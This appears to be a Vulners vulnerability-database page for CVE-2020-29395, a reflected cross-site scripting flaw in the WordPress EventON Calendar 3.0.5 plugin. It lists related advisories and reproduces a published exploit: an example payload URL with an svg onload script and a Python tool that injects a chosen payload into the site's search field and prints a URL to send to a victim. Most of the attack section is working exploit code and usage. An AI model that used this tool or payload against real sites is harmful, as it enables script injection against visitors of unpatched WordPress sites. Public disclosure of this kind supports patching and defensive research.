Vulners
Lucene search
WordPress EventON Calendar 3.0.5 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2020-29395 | 15 Dec 202014:02 | – | circl |
 | WordPress plugin 跨站脚本漏洞 | 30 Nov 202000:00 | – | cnnvd |
 | WordPress EventON Cross-Site Scripting Vulnerability | 1 Dec 202000:00 | – | cnvd |
 | CVE-2020-29395 | 30 Nov 202019:05 | – | cve |
 | CVE-2020-29395 | 30 Nov 202019:05 | – | cvelist |
 | Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting | 6 Jun 202603:01 | – | nuclei |
 | CVE-2020-29395 | 30 Nov 202020:15 | – | nvd |
 | CVE-2020-29395 | 30 Nov 202020:15 | – | osv |
 | WordPress eventON premium plugin <= 3.0.5 - Cross-Site Scripting (XSS) vulnerability | 1 Dec 202000:00 | – | patchstack |
 | Design/Logic Flaw | 30 Nov 202020:15 | – | prion |
10
`# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
"""
~ VULNERABLITY DETAILS ~
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
#
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected
into the search field.
#
The following python code will inject javascript code and print out url that will be sent to victim.
If you use unicode caracters for xss , exploit will print page source.
##USAGE##
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
##OUTPUT##
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
"""
import requests
import sys
import argparse
from colorama import Fore
def vuln_reflected(url, payload):
s = requests.Session()
get_request = s.get(url+payload)
if get_request.status_code == 500:
print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
else:
content_result = str(get_request.content)
search_find = content_result.find(payload)
if search_find != -1:
print(Fore.GREEN+"[+] "+str(url)+str(payload))
else:
print(content_result)
def main():
desc = "Wordpress EventON Calendar Plugin XSS"
parser = argparse.ArgumentParser(description=desc)
exp_option = parser.add_argument_group('')
parser.add_argument("--exploit", help ="", action='store_true')
parser.add_argument("--url",help="", type=str, required=False)
parser.add_argument("--payload",help="",type=str,required=False)
args = parser.parse_args()
if args.exploit:
if args.url:
if args.payload:
url = args.url
payload = args.payload
vuln_reflected(url, payload)
if name == 'main':
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Dec 2020 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.03284